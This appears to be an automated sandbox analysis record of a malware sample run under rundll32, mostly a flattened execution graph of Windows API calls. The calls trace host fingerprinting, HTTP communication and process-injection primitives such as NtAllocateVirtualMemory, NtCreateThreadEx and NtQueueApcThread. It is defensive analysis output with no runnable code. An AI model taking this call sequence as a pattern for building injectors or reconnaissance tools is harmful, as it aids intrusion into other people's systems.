                                                                    • Source File: 00000004.00000003.2085178230.0000027619780000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027619780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_3_27619780000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                    • Instruction ID: 5c289638610935c11f324b0bc5c22f25e195e3caa83ef2dd990b29922300cc8f
                                                                    • Opcode Fuzzy Hash: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
                                                                    • Instruction Fuzzy Hash: 0201F421A1DF5A0BE799E66D68CD7A276E2FBD8310F9CC0A5E80EC7386D824C9414380

                                                                    Execution Graph

                                                                    Execution Coverage:4.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:961
                                                                    Total number of Limit Nodes:8
2339fb8f215 16852->16853 16854 2339fb8cce0 LdrGetProcedureAddress 16853->16854 16855 2339fb8f234 16854->16855 16856 2339fb8cce0 LdrGetProcedureAddress 16855->16856 16857 2339fb8f253 16856->16857 16858 2339fb8cce0 LdrGetProcedureAddress 16857->16858 16859 2339fb8f272 16858->16859 16860 2339fb8cce0 LdrGetProcedureAddress 16859->16860 16861 2339fb8f291 16860->16861 16862 2339fb8cce0 LdrGetProcedureAddress 16861->16862 16863 2339fb8f2b0 16862->16863 16864 2339fb8cce0 LdrGetProcedureAddress 16863->16864 16865 2339fb8f2cf 16864->16865 16866 2339fb8cce0 LdrGetProcedureAddress 16865->16866 16867 2339fb8f2ee 16866->16867 16868 2339fb8cce0 LdrGetProcedureAddress 16867->16868 16869 2339fb8f30d 16868->16869 16870 2339fb8cce0 LdrGetProcedureAddress 16869->16870 16871 2339fb8f32c 16870->16871 16872 2339fb8cce0 LdrGetProcedureAddress 16871->16872 16873 2339fb8f34b 16872->16873 16874 2339fb8cce0 LdrGetProcedureAddress 16873->16874 16875 2339fb8f36a 16874->16875 16876 2339fb8cce0 LdrGetProcedureAddress 16875->16876 16877 2339fb8f389 16876->16877 16878 2339fb8cce0 LdrGetProcedureAddress 16877->16878 16879 2339fb8f3a8 16878->16879 16880 2339fb8cce0 LdrGetProcedureAddress 16879->16880 16881 2339fb8f3c7 16880->16881 16882 2339fb8cce0 LdrGetProcedureAddress 16881->16882 16883 2339fb8f3e6 16882->16883 16884 2339fb8cce0 LdrGetProcedureAddress 16883->16884 16885 2339fb8f405 16884->16885 16886 2339fb8cce0 LdrGetProcedureAddress 16885->16886 16887 2339fb8f424 16886->16887 16888 2339fb8cce0 LdrGetProcedureAddress 16887->16888 16889 2339fb8f443 16888->16889 16890 2339fb8cce0 LdrGetProcedureAddress 16889->16890 16891 2339fb8f462 16890->16891 16892 2339fb8cce0 LdrGetProcedureAddress 16891->16892 16893 2339fb8f481 16892->16893 16894 2339fb8cce0 LdrGetProcedureAddress 16893->16894 16895 2339fb8f4a0 16894->16895 16896 2339fb8cce0 LdrGetProcedureAddress 16895->16896 16897 2339fb8f4bf 16896->16897 16898 2339fb8cce0 LdrGetProcedureAddress 16897->16898 16899 2339fb8f4de 16898->16899 16900 2339fb8cce0 
LdrGetProcedureAddress 16899->16900 16901 2339fb8f4fd 16900->16901 16902 2339fb8cce0 LdrGetProcedureAddress 16901->16902 16903 2339fb8f51c 16902->16903 16904 2339fb8cce0 LdrGetProcedureAddress 16903->16904 16905 2339fb8f53b 16904->16905 16906 2339fb8cce0 LdrGetProcedureAddress 16905->16906 16907 2339fb8f55a 16906->16907 16908 2339fb8cce0 LdrGetProcedureAddress 16907->16908 16909 2339fb8f579 16908->16909 16910 2339fb8cce0 LdrGetProcedureAddress 16909->16910 16911 2339fb8f598 16910->16911 16912 2339fb8cce0 LdrGetProcedureAddress 16911->16912 16913 2339fb8f5b7 16912->16913 16914 2339fb8cce0 LdrGetProcedureAddress 16913->16914 16915 2339fb8f5d6 16914->16915 16916 2339fb8cce0 LdrGetProcedureAddress 16915->16916 16916->16784 17298 2339fba4ce0 16917->17298 16922 2339fbb3de0 RtlFreeHeap 16923 2339fb890af 16922->16923 16924 2339fbb3de0 RtlFreeHeap 16923->16924 16925 2339fb89110 16924->16925 16926 2339fbb3de0 RtlFreeHeap 16925->16926 16927 2339fb8916c 16926->16927 16928 2339fbb3de0 RtlFreeHeap 16927->16928 16929 2339fb891a1 16928->16929 16930 2339fbb3de0 RtlFreeHeap 16929->16930 16931 2339fb891f1 16930->16931 16932 2339fbb3de0 RtlFreeHeap 16931->16932 16933 2339fb89222 16932->16933 16934 2339fbb3de0 RtlFreeHeap 16933->16934 16935 2339fb8925a 16934->16935 16936 2339fbb3de0 RtlFreeHeap 16935->16936 16937 2339fb892af 16936->16937 16938 2339fbb3de0 RtlFreeHeap 16937->16938 16939 2339fb892f1 16938->16939 16940 2339fbb3de0 RtlFreeHeap 16939->16940 16941 2339fb89333 16940->16941 16942 2339fbb3de0 RtlFreeHeap 16941->16942 16943 2339fb89347 16942->16943 16944 2339fbb3de0 RtlFreeHeap 16943->16944 16945 2339fb89362 16944->16945 16946 2339fbb3de0 RtlFreeHeap 16945->16946 16947 2339fb8938e 16946->16947 16948 2339fbb3de0 RtlFreeHeap 16947->16948 16949 2339fb893c1 16948->16949 16949->16767 16951 2339fb87fb8 16950->16951 16952 2339fb87f99 16950->16952 16954 2339fb87fda 16951->16954 16955 2339fbb3de0 RtlFreeHeap 16951->16955 16953 2339fbb3de0 RtlFreeHeap 16952->16953 16953->16951 17304 
2339fba5560 16954->17304 16955->16954 16959 2339fba5560 RtlFreeHeap 16963 2339fb88066 16959->16963 16960 2339fb8802a 16960->16959 16961 2339fb88088 16962 2339fba5560 RtlFreeHeap 16961->16962 16967 2339fb8809c 16962->16967 16963->16961 16965 2339fbab4e0 RtlFreeHeap 16963->16965 16964 2339fb880be 16966 2339fba5560 RtlFreeHeap 16964->16966 16965->16961 16971 2339fb880d2 16966->16971 16967->16964 16968 2339fbab4e0 RtlFreeHeap 16967->16968 16968->16964 16969 2339fb880f4 16970 2339fba5560 RtlFreeHeap 16969->16970 16975 2339fb88108 16970->16975 16971->16969 16972 2339fbab4e0 RtlFreeHeap 16971->16972 16972->16969 16973 2339fb8812a 16974 2339fba5560 RtlFreeHeap 16973->16974 16979 2339fb8813e 16974->16979 16975->16973 16976 2339fbab4e0 RtlFreeHeap 16975->16976 16976->16973 16977 2339fb88160 16978 2339fba5560 RtlFreeHeap 16977->16978 16983 2339fb88174 16978->16983 16979->16977 16980 2339fbab4e0 RtlFreeHeap 16979->16980 16980->16977 16981 2339fb88197 16982 2339fba5560 RtlFreeHeap 16981->16982 16987 2339fb881ab 16982->16987 16983->16981 16984 2339fbab4e0 RtlFreeHeap 16983->16984 16984->16981 16985 2339fb881d4 16986 2339fba5560 RtlFreeHeap 16985->16986 16988 2339fb881e8 16986->16988 16987->16985 16989 2339fbab4e0 RtlFreeHeap 16987->16989 16990 2339fb8823d 16988->16990 16992 2339fb9be20 RtlFreeHeap 16988->16992 16989->16985 16991 2339fba5560 RtlFreeHeap 16990->16991 17012 2339fb88251 16991->17012 16993 2339fb88214 16992->16993 16996 2339fbab4e0 RtlFreeHeap 16993->16996 16994 2339fb8838a 16995 2339fba5560 RtlFreeHeap 16994->16995 16997 2339fb8839e 16995->16997 16998 2339fb88235 16996->16998 16999 2339fba5560 RtlFreeHeap 16997->16999 17000 2339fbab4e0 RtlFreeHeap 16998->17000 17003 2339fb883ba 16999->17003 17000->16990 17001 2339fb88430 17002 2339fba5560 RtlFreeHeap 17001->17002 17004 2339fb88444 17002->17004 17003->17001 17016 2339fbab4e0 RtlFreeHeap 17003->17016 17079 2339fb88b86 17003->17079 17005 2339fb8846d 17004->17005 17010 2339fb9be20 RtlFreeHeap 17004->17010 17011 
2339fba5560 RtlFreeHeap 17005->17011 17006 2339fb8835d 17009 2339fbab4e0 RtlFreeHeap 17006->17009 17007 2339fb88322 17007->17006 17019 2339fb8a050 RtlFreeHeap 17007->17019 17013 2339fb8837d 17009->17013 17014 2339fb88460 17010->17014 17015 2339fb8848e 17011->17015 17012->16994 17012->17007 17312 2339fb8a050 17012->17312 17017 2339fbab4e0 RtlFreeHeap 17013->17017 17018 2339fbab4e0 RtlFreeHeap 17014->17018 17020 2339fb884b7 17015->17020 17022 2339fb9be20 RtlFreeHeap 17015->17022 17021 2339fb88423 17016->17021 17017->16994 17018->17005 17019->17006 17025 2339fba5560 RtlFreeHeap 17020->17025 17023 2339fbab4e0 RtlFreeHeap 17021->17023 17024 2339fb884aa 17022->17024 17023->17001 17026 2339fbab4e0 RtlFreeHeap 17024->17026 17027 2339fb884d8 17025->17027 17026->17020 17028 2339fb88501 17027->17028 17029 2339fb9be20 RtlFreeHeap 17027->17029 17030 2339fba5560 RtlFreeHeap 17028->17030 17031 2339fb884f4 17029->17031 17032 2339fb88522 17030->17032 17033 2339fbab4e0 RtlFreeHeap 17031->17033 17034 2339fb8854b 17032->17034 17035 2339fb9be20 RtlFreeHeap 17032->17035 17033->17028 17037 2339fba5560 RtlFreeHeap 17034->17037 17036 2339fb8853e 17035->17036 17038 2339fbab4e0 RtlFreeHeap 17036->17038 17039 2339fb8856c 17037->17039 17038->17034 17040 2339fb88595 17039->17040 17041 2339fb9be20 RtlFreeHeap 17039->17041 17042 2339fba5560 RtlFreeHeap 17040->17042 17043 2339fb88588 17041->17043 17045 2339fb885b6 17042->17045 17044 2339fbab4e0 RtlFreeHeap 17043->17044 17044->17040 17046 2339fba5560 RtlFreeHeap 17045->17046 17047 2339fb885d2 17046->17047 17048 2339fbab4e0 RtlFreeHeap 17047->17048 17047->17079 17049 2339fb88625 17048->17049 17050 2339fbab4e0 RtlFreeHeap 17049->17050 17051 2339fb8865e 17050->17051 17052 2339fba5560 RtlFreeHeap 17051->17052 17055 2339fb88672 17052->17055 17053 2339fbab4e0 RtlFreeHeap 17054 2339fb88797 17053->17054 17056 2339fbab4e0 RtlFreeHeap 17054->17056 17055->17053 17055->17079 17057 2339fb887a4 17056->17057 17058 2339fba5560 RtlFreeHeap 17057->17058 17059 
2339fb887b8 17058->17059 17060 2339fbab4e0 RtlFreeHeap 17059->17060 17059->17079 17061 2339fb887ec 17060->17061 17062 2339fba5560 RtlFreeHeap 17061->17062 17063 2339fb88800 17062->17063 17064 2339fbab4e0 RtlFreeHeap 17063->17064 17063->17079 17065 2339fb8882d 17064->17065 17066 2339fba5560 RtlFreeHeap 17065->17066 17067 2339fb88841 17066->17067 17068 2339fba5560 RtlFreeHeap 17067->17068 17069 2339fb8885d 17068->17069 17070 2339fbab4e0 RtlFreeHeap 17069->17070 17069->17079 17071 2339fb88897 17070->17071 17072 2339fba5560 RtlFreeHeap 17071->17072 17073 2339fb888ab 17072->17073 17074 2339fbab4e0 RtlFreeHeap 17073->17074 17073->17079 17075 2339fb889c8 17074->17075 17076 2339fbab4e0 RtlFreeHeap 17075->17076 17077 2339fb889d5 17076->17077 17078 2339fba5560 RtlFreeHeap 17077->17078 17088 2339fb889eb 17078->17088 17079->16769 17080 2339fb88aec 17084 2339fb9be20 RtlFreeHeap 17080->17084 17090 2339fb88b47 17080->17090 17081 2339fbab4e0 RtlFreeHeap 17083 2339fb88b79 17081->17083 17082 2339fb9be20 RtlFreeHeap 17082->17088 17085 2339fbab4e0 RtlFreeHeap 17083->17085 17086 2339fb88b2a 17084->17086 17085->17079 17089 2339fbab4e0 RtlFreeHeap 17086->17089 17087 2339fbab4e0 RtlFreeHeap 17087->17088 17088->17079 17088->17080 17088->17082 17088->17087 17089->17090 17090->17081 17092 2339fba4db1 17091->17092 17093 2339fba4dc7 GetComputerNameExW 17091->17093 17092->17093 17094 2339fba4def 17093->17094 17095 2339fba4df3 GetTokenInformation 17094->17095 17100 2339fba4e4e 17094->17100 17096 2339fba4e1c 17095->17096 17095->17100 17097 2339fba4e3e 17096->17097 17099 2339fbb3de0 RtlFreeHeap 17096->17099 17098 2339fbb3de0 RtlFreeHeap 17097->17098 17098->17100 17099->17097 17101 2339fb9dfc0 RtlFreeHeap 17100->17101 17102 2339fba4e90 17101->17102 17103 2339fba4eaa GetNativeSystemInfo 17102->17103 17106 2339fbb3de0 RtlFreeHeap 17102->17106 17104 2339fba4ed3 17103->17104 17105 2339fba4ee8 17103->17105 17108 2339fbb3de0 RtlFreeHeap 17104->17108 17105->17104 17107 2339fba4f17 17105->17107 
17106->17103 17109 2339fbb3de0 RtlFreeHeap 17107->17109 17110 2339fba4f15 17108->17110 17109->17110 17114 2339fbb3de0 RtlFreeHeap 17110->17114 17116 2339fba4f67 17110->17116 17111 2339fba4f8f GetAdaptersInfo 17112 2339fba4fdd 17111->17112 17113 2339fba4fbb 17111->17113 17112->17113 17119 2339fba4fea GetAdaptersInfo 17112->17119 17115 2339fbab4e0 RtlFreeHeap 17113->17115 17114->17116 17117 2339fba4fc5 17115->17117 17116->17111 17118 2339fbab4e0 RtlFreeHeap 17117->17118 17120 2339fba4fcd 17118->17120 17119->17113 17121 2339fba4fff 17119->17121 17120->16772 17121->17113 17122 2339fbb3de0 RtlFreeHeap 17121->17122 17122->17121 17125 2339fbb4759 17123->17125 17124 2339fbb47af 17124->16776 17125->17124 17126 2339fbb47ad NtFreeVirtualMemory 17125->17126 17126->17124 17316 2339fb93270 17127->17316 17130 2339fbb3de0 RtlFreeHeap 17131 2339fb93ebe 17130->17131 17132 2339fbb3de0 RtlFreeHeap 17131->17132 17133 2339fb93ee0 17132->17133 17134 2339fbb3de0 RtlFreeHeap 17133->17134 17135 2339fb93f02 17134->17135 17136 2339fbab4e0 RtlFreeHeap 17135->17136 17137 2339fb93f1d 17136->17137 17138 2339fbab4e0 RtlFreeHeap 17137->17138 17139 2339fb93f61 17138->17139 17140 2339fb93fd7 17139->17140 17142 2339fb93fc0 17139->17142 17143 2339fb93fd9 17139->17143 17141 2339fb8a050 RtlFreeHeap 17140->17141 17144 2339fb94005 17140->17144 17141->17144 17142->17140 17147 2339fb8a050 RtlFreeHeap 17142->17147 17145 2339fb8a050 RtlFreeHeap 17143->17145 17146 2339fbab4e0 RtlFreeHeap 17144->17146 17145->17140 17148 2339fb9400d 17146->17148 17147->17140 17149 2339fbab4e0 RtlFreeHeap 17148->17149 17150 2339fb94015 17149->17150 17151 2339fb94060 17150->17151 17152 2339fb94067 17150->17152 17340 2339fb96fa0 17151->17340 17416 2339fb87830 17152->17416 17155 2339fb94065 17156 2339fbab4e0 RtlFreeHeap 17155->17156 17157 2339fb9407f 17156->17157 17158 2339fb940bb 17157->17158 17159 2339fb9be20 RtlFreeHeap 17157->17159 17160 2339fbab4e0 RtlFreeHeap 17158->17160 17161 2339fb940ac 17159->17161 17162 2339fb9411c 
17160->17162 17163 2339fb940b3 17161->17163 17171 2339fb940bd 17161->17171 17164 2339fbab4e0 RtlFreeHeap 17162->17164 17165 2339fbab4e0 RtlFreeHeap 17163->17165 17166 2339fb94124 17164->17166 17165->17158 17167 2339fbab4e0 RtlFreeHeap 17166->17167 17168 2339fb9412c 17167->17168 17169 2339fbab4e0 RtlFreeHeap 17168->17169 17170 2339fb94139 17169->17170 17170->16776 17172 2339fbab4e0 RtlFreeHeap 17171->17172 17172->17158 17174 2339fb88bde 17173->17174 17175 2339fb8a050 RtlFreeHeap 17174->17175 17176 2339fb88c5e 17175->17176 17177 2339fb8a050 RtlFreeHeap 17176->17177 17178 2339fb88c97 17177->17178 17179 2339fbab4e0 RtlFreeHeap 17178->17179 17180 2339fb88cee 17179->17180 17181 2339fb88d5c 17180->17181 17182 2339fb88d5e 17180->17182 17183 2339fb88d44 17180->17183 17184 2339fb8a050 RtlFreeHeap 17181->17184 17186 2339fb88d8b 17181->17186 17185 2339fb8a050 RtlFreeHeap 17182->17185 17183->17181 17187 2339fb8a050 RtlFreeHeap 17183->17187 17184->17186 17185->17181 17188 2339fbab4e0 RtlFreeHeap 17186->17188 17187->17181 17189 2339fb88d93 17188->17189 17190 2339fbab4e0 RtlFreeHeap 17189->17190 17191 2339fb88d9b 17190->17191 17192 2339fb88df0 17191->17192 17193 2339fb88de9 17191->17193 17195 2339fb87830 8 API calls 17192->17195 17194 2339fb96fa0 2 API calls 17193->17194 17196 2339fb88dee 17194->17196 17195->17196 17197 2339fb88e8e 17196->17197 17199 2339fb9be20 RtlFreeHeap 17196->17199 17463 2339fb817b0 17197->17463 17200 2339fb88e23 17199->17200 17201 2339fb88e2a 17200->17201 17206 2339fb88e34 17200->17206 17203 2339fbab4e0 RtlFreeHeap 17201->17203 17202 2339fbab4e0 RtlFreeHeap 17204 2339fb88ea4 17202->17204 17205 2339fb88e32 17203->17205 17207 2339fbab4e0 RtlFreeHeap 17204->17207 17205->17202 17210 2339fbab4e0 RtlFreeHeap 17206->17210 17208 2339fb88eac 17207->17208 17209 2339fbab4e0 RtlFreeHeap 17208->17209 17211 2339fb88eb4 17209->17211 17212 2339fb88e5f 17210->17212 17213 2339fbab4e0 RtlFreeHeap 17211->17213 17214 2339fb8a050 RtlFreeHeap 17212->17214 17215 2339fb88ebc 
17213->17215 17216 2339fb88e71 17214->17216 17215->16776 17217 2339fbab4e0 RtlFreeHeap 17216->17217 17218 2339fb88e79 17217->17218 17474 2339fba51d0 17218->17474 17221 2339fbab4e0 RtlFreeHeap 17221->17197 17224 2339fb8fff9 17222->17224 17223 2339fb82939 17242 2339fb8f8a0 17223->17242 17224->17223 17225 2339fb8cce0 LdrGetProcedureAddress 17224->17225 17226 2339fb90072 17225->17226 17227 2339fb8cce0 LdrGetProcedureAddress 17226->17227 17228 2339fb9008d 17227->17228 17229 2339fb8cce0 LdrGetProcedureAddress 17228->17229 17230 2339fb900b6 17229->17230 17231 2339fb8cce0 LdrGetProcedureAddress 17230->17231 17232 2339fb900d5 17231->17232 17233 2339fb8cce0 LdrGetProcedureAddress 17232->17233 17234 2339fb900f4 17233->17234 17235 2339fb8cce0 LdrGetProcedureAddress 17234->17235 17236 2339fb90113 17235->17236 17237 2339fb8cce0 LdrGetProcedureAddress 17236->17237 17238 2339fb90132 17237->17238 17239 2339fb8cce0 LdrGetProcedureAddress 17238->17239 17240 2339fb90151 17239->17240 17241 2339fb8cce0 LdrGetProcedureAddress 17240->17241 17241->17223 17243 2339fb8f8da 17242->17243 17244 2339fb8293e 17243->17244 17245 2339fb8cce0 LdrGetProcedureAddress 17243->17245 17250 2339fb93470 17244->17250 17246 2339fb8f900 17245->17246 17247 2339fb8cce0 LdrGetProcedureAddress 17246->17247 17248 2339fb8f91b 17247->17248 17249 2339fb8cce0 LdrGetProcedureAddress 17248->17249 17249->17244 17252 2339fb93489 17250->17252 17251 2339fb93493 17251->16785 17252->17251 17253 2339fb8cce0 LdrGetProcedureAddress 17252->17253 17254 2339fb93502 17253->17254 17255 2339fb8cce0 LdrGetProcedureAddress 17254->17255 17256 2339fb9351d 17255->17256 17257 2339fb8cce0 LdrGetProcedureAddress 17256->17257 17258 2339fb93546 17257->17258 17259 2339fb8cce0 LdrGetProcedureAddress 17258->17259 17260 2339fb93565 17259->17260 17261 2339fb8cce0 LdrGetProcedureAddress 17260->17261 17262 2339fb93584 17261->17262 17263 2339fb8cce0 LdrGetProcedureAddress 17262->17263 17264 2339fb935a3 17263->17264 17265 2339fb8cce0 
LdrGetProcedureAddress 17264->17265 17266 2339fb935c2 17265->17266 17267 2339fb8cce0 LdrGetProcedureAddress 17266->17267 17268 2339fb935e1 17267->17268 17269 2339fb8cce0 LdrGetProcedureAddress 17268->17269 17270 2339fb93600 17269->17270 17271 2339fb8cce0 LdrGetProcedureAddress 17270->17271 17272 2339fb9361f 17271->17272 17273 2339fb8cce0 LdrGetProcedureAddress 17272->17273 17274 2339fb9363e 17273->17274 17275 2339fb8cce0 LdrGetProcedureAddress 17274->17275 17276 2339fb9365d 17275->17276 17277 2339fb8cce0 LdrGetProcedureAddress 17276->17277 17278 2339fb9367c 17277->17278 17279 2339fb8cce0 LdrGetProcedureAddress 17278->17279 17280 2339fb9369b 17279->17280 17281 2339fb8cce0 LdrGetProcedureAddress 17280->17281 17282 2339fb936ba 17281->17282 17283 2339fb8cce0 LdrGetProcedureAddress 17282->17283 17284 2339fb936d9 17283->17284 17285 2339fb8cce0 LdrGetProcedureAddress 17284->17285 17286 2339fb936f8 17285->17286 17287 2339fb8cce0 LdrGetProcedureAddress 17286->17287 17288 2339fb93717 17287->17288 17289 2339fb8cce0 LdrGetProcedureAddress 17288->17289 17290 2339fb93736 17289->17290 17291 2339fb8cce0 LdrGetProcedureAddress 17290->17291 17292 2339fb93755 17291->17292 17293 2339fb8cce0 LdrGetProcedureAddress 17292->17293 17293->17251 17296 2339fb8cd1b 17294->17296 17295 2339fb8cdbf 17295->16788 17296->17295 17297 2339fb8cd9b LdrGetProcedureAddress 17296->17297 17297->17295 17299 2339fb88eee CreateMutexExA 17298->17299 17300 2339fbb3de0 17299->17300 17302 2339fbb3e14 17300->17302 17301 2339fb88f71 17301->16922 17302->17301 17303 2339fbab4e0 RtlFreeHeap 17302->17303 17303->17302 17305 2339fb88016 17304->17305 17306 2339fba557b 17304->17306 17305->16960 17308 2339fb9be20 17305->17308 17306->17305 17307 2339fbab4e0 RtlFreeHeap 17306->17307 17307->17305 17310 2339fb9be5c 17308->17310 17309 2339fb9bea5 17309->16960 17310->17309 17311 2339fbab4e0 RtlFreeHeap 17310->17311 17311->17309 17314 2339fb8a084 17312->17314 17313 2339fb8a118 17313->17012 17314->17313 17315 2339fbab4e0 RtlFreeHeap 
17314->17315 17315->17314 17318 2339fb93287 17316->17318 17317 2339fb93291 17317->17130 17318->17317 17319 2339fb8cce0 LdrGetProcedureAddress 17318->17319 17320 2339fb93306 17319->17320 17321 2339fb8cce0 LdrGetProcedureAddress 17320->17321 17322 2339fb93321 17321->17322 17323 2339fb8cce0 LdrGetProcedureAddress 17322->17323 17324 2339fb9334a 17323->17324 17325 2339fb8cce0 LdrGetProcedureAddress 17324->17325 17326 2339fb93369 17325->17326 17327 2339fb8cce0 LdrGetProcedureAddress 17326->17327 17328 2339fb93388 17327->17328 17329 2339fb8cce0 LdrGetProcedureAddress 17328->17329 17330 2339fb933a7 17329->17330 17331 2339fb8cce0 LdrGetProcedureAddress 17330->17331 17332 2339fb933c6 17331->17332 17333 2339fb8cce0 LdrGetProcedureAddress 17332->17333 17334 2339fb933e5 17333->17334 17335 2339fb8cce0 LdrGetProcedureAddress 17334->17335 17336 2339fb93404 17335->17336 17337 2339fb8cce0 LdrGetProcedureAddress 17336->17337 17338 2339fb93423 17337->17338 17339 2339fb8cce0 LdrGetProcedureAddress 17338->17339 17339->17317 17341 2339fb97037 17340->17341 17342 2339fb97319 17341->17342 17343 2339fb970a9 17341->17343 17344 2339fbab4e0 RtlFreeHeap 17342->17344 17440 2339fb893f0 17343->17440 17346 2339fb9732d 17344->17346 17349 2339fb893f0 RtlFreeHeap 17346->17349 17348 2339fb8a050 RtlFreeHeap 17350 2339fb970ce 17348->17350 17351 2339fb97339 17349->17351 17353 2339fb893f0 RtlFreeHeap 17350->17353 17352 2339fb8a050 RtlFreeHeap 17351->17352 17354 2339fb9734d 17352->17354 17355 2339fb970d9 17353->17355 17356 2339fb893f0 RtlFreeHeap 17354->17356 17357 2339fb8a050 RtlFreeHeap 17355->17357 17358 2339fb97358 17356->17358 17359 2339fb97106 17357->17359 17360 2339fb8a050 RtlFreeHeap 17358->17360 17446 2339fb87370 17359->17446 17362 2339fb97385 17360->17362 17363 2339fb87370 2 API calls 17362->17363 17365 2339fb973b9 17363->17365 17364 2339fb97740 17366 2339fbab4e0 RtlFreeHeap 17364->17366 17365->17364 17368 2339fbab4e0 RtlFreeHeap 17365->17368 17367 2339fb9775a 17366->17367 17367->17155 17369 
2339fb973cc 17368->17369 17371 2339fb893f0 RtlFreeHeap 17369->17371 17370 2339fbab4e0 RtlFreeHeap 17388 2339fb9713a 17370->17388 17374 2339fb973db 17371->17374 17372 2339fb97257 17373 2339fbab4e0 RtlFreeHeap 17372->17373 17392 2339fb97452 17372->17392 17376 2339fb97282 17373->17376 17378 2339fb8a050 RtlFreeHeap 17374->17378 17375 2339fb893f0 RtlFreeHeap 17375->17388 17380 2339fb893f0 RtlFreeHeap 17376->17380 17377 2339fbab4e0 RtlFreeHeap 17377->17392 17385 2339fb97409 17378->17385 17379 2339fb8a050 RtlFreeHeap 17379->17388 17381 2339fb97292 17380->17381 17384 2339fb8a050 RtlFreeHeap 17381->17384 17382 2339fb893f0 RtlFreeHeap 17382->17392 17383 2339fb87370 2 API calls 17383->17385 17391 2339fb972d1 17384->17391 17385->17383 17385->17392 17386 2339fb87370 2 API calls 17386->17388 17387 2339fb8a050 RtlFreeHeap 17387->17392 17388->17364 17388->17370 17388->17372 17388->17375 17388->17379 17388->17386 17389 2339fb87370 2 API calls 17389->17391 17390 2339fb87370 2 API calls 17390->17392 17391->17389 17391->17392 17392->17377 17392->17382 17392->17387 17392->17390 17393 2339fb974f8 17392->17393 17394 2339fb9750e 17393->17394 17395 2339fbab4e0 RtlFreeHeap 17393->17395 17394->17364 17396 2339fbab4e0 RtlFreeHeap 17394->17396 17395->17394 17397 2339fb97529 17396->17397 17398 2339fb8a050 RtlFreeHeap 17397->17398 17401 2339fb9754c 17398->17401 17399 2339fb87370 2 API calls 17399->17401 17400 2339fbab4e0 RtlFreeHeap 17400->17401 17401->17399 17401->17400 17405 2339fb975b1 17401->17405 17402 2339fbab4e0 RtlFreeHeap 17402->17405 17403 2339fb893f0 RtlFreeHeap 17403->17405 17404 2339fb87370 2 API calls 17404->17405 17405->17364 17405->17402 17405->17403 17405->17404 17406 2339fb8a050 RtlFreeHeap 17405->17406 17407 2339fb9769e 17405->17407 17406->17405 17408 2339fbab4e0 RtlFreeHeap 17407->17408 17409 2339fb976a6 17408->17409 17410 2339fb893f0 RtlFreeHeap 17409->17410 17411 2339fb976b2 17410->17411 17412 2339fb8a050 RtlFreeHeap 17411->17412 17415 2339fb976e5 17412->17415 17413 
2339fb87370 2 API calls 17413->17415 17414 2339fbab4e0 RtlFreeHeap 17414->17415 17415->17364 17415->17413 17415->17414 17417 2339fb87885 17416->17417 17418 2339fb8788a InternetOpenW 17416->17418 17417->17418 17419 2339fb87898 InternetConnectW 17418->17419 17420 2339fb87aed 17418->17420 17419->17420 17421 2339fb878dd HttpOpenRequestW 17419->17421 17422 2339fb87b0e InternetCloseHandle 17420->17422 17424 2339fb87b17 17420->17424 17421->17420 17425 2339fb87931 17421->17425 17422->17424 17423 2339fb87b60 17423->17155 17424->17423 17427 2339fb87b56 17424->17427 17429 2339fb87b8c 17424->17429 17425->17420 17426 2339fb879cb HttpSendRequestA 17425->17426 17426->17420 17428 2339fb879e4 17426->17428 17427->17423 17430 2339fbab4e0 RtlFreeHeap 17427->17430 17434 2339fbab4e0 RtlFreeHeap 17428->17434 17438 2339fb87a24 17428->17438 17431 2339fb8a050 RtlFreeHeap 17429->17431 17430->17423 17432 2339fb87ba4 17431->17432 17433 2339fbab4e0 RtlFreeHeap 17432->17433 17433->17423 17434->17438 17435 2339fb87a3f InternetQueryDataAvailable 17436 2339fb87ae3 17435->17436 17435->17438 17437 2339fbab4e0 RtlFreeHeap 17436->17437 17437->17420 17438->17435 17438->17436 17439 2339fb87a98 RtlReAllocateHeap 17438->17439 17439->17438 17441 2339fb89400 17440->17441 17442 2339fb89483 17441->17442 17445 2339fbab4e0 RtlFreeHeap 17441->17445 17443 2339fbab4e0 RtlFreeHeap 17442->17443 17444 2339fb894f0 17443->17444 17444->17348 17445->17442 17453 2339fb8fb20 17446->17453 17448 2339fb87422 17449 2339fbab4e0 RtlFreeHeap 17448->17449 17450 2339fb8780a 17449->17450 17450->17388 17451 2339fb873a4 17451->17448 17452 2339fb8a050 RtlFreeHeap 17451->17452 17452->17451 17454 2339fb8fb39 17453->17454 17455 2339fb8fb43 17454->17455 17456 2339fb8cce0 LdrGetProcedureAddress 17454->17456 17455->17451 17457 2339fb8fbae 17456->17457 17458 2339fb8cce0 LdrGetProcedureAddress 17457->17458 17459 2339fb8fbc9 17458->17459 17460 2339fb8cce0 LdrGetProcedureAddress 17459->17460 17461 2339fb8fbf0 17460->17461 17462 2339fb8cce0 
LdrGetProcedureAddress 17461->17462 17462->17455 17470 2339fb817f5 17463->17470 17464 2339fb8180f 17465 2339fbab4e0 RtlFreeHeap 17464->17465 17466 2339fb81820 17465->17466 17467 2339fbab4e0 RtlFreeHeap 17466->17467 17468 2339fb81838 17467->17468 17469 2339fb8a050 RtlFreeHeap 17468->17469 17471 2339fb81b61 17468->17471 17472 2339fbab4e0 RtlFreeHeap 17468->17472 17469->17468 17470->17464 17478 2339fb84cd0 17470->17478 17471->17205 17472->17468 17475 2339fba51e5 17474->17475 17476 2339fbab4e0 RtlFreeHeap 17475->17476 17477 2339fb88e86 17475->17477 17476->17477 17477->17221 17483 2339fbb4360 17478->17483 17482 2339fb84d58 17482->17470 17485 2339fbb43bd 17483->17485 17484 2339fb84d3d 17487 2339fbb4ff0 17484->17487 17485->17484 17486 2339fbb444e NtCreateThreadEx 17485->17486 17486->17484 17489 2339fbb5011 17487->17489 17488 2339fbb506c 17488->17482 17489->17488 17490 2339fbb506a NtQueueApcThread 17489->17490 17490->17488 17495 2339fbb4be0 17497 2339fbb4c02 17495->17497 17496 2339fbb4c5e 17497->17496 17498 2339fbb4c5c NtProtectVirtualMemory 17497->17498 17498->17496 17491 2339fbb3f40 17492 2339fbb3f69 17491->17492 17493 2339fbb3fc9 17492->17493 17494 2339fbb3fc7 NtAllocateVirtualMemory 17492->17494 17494->17493

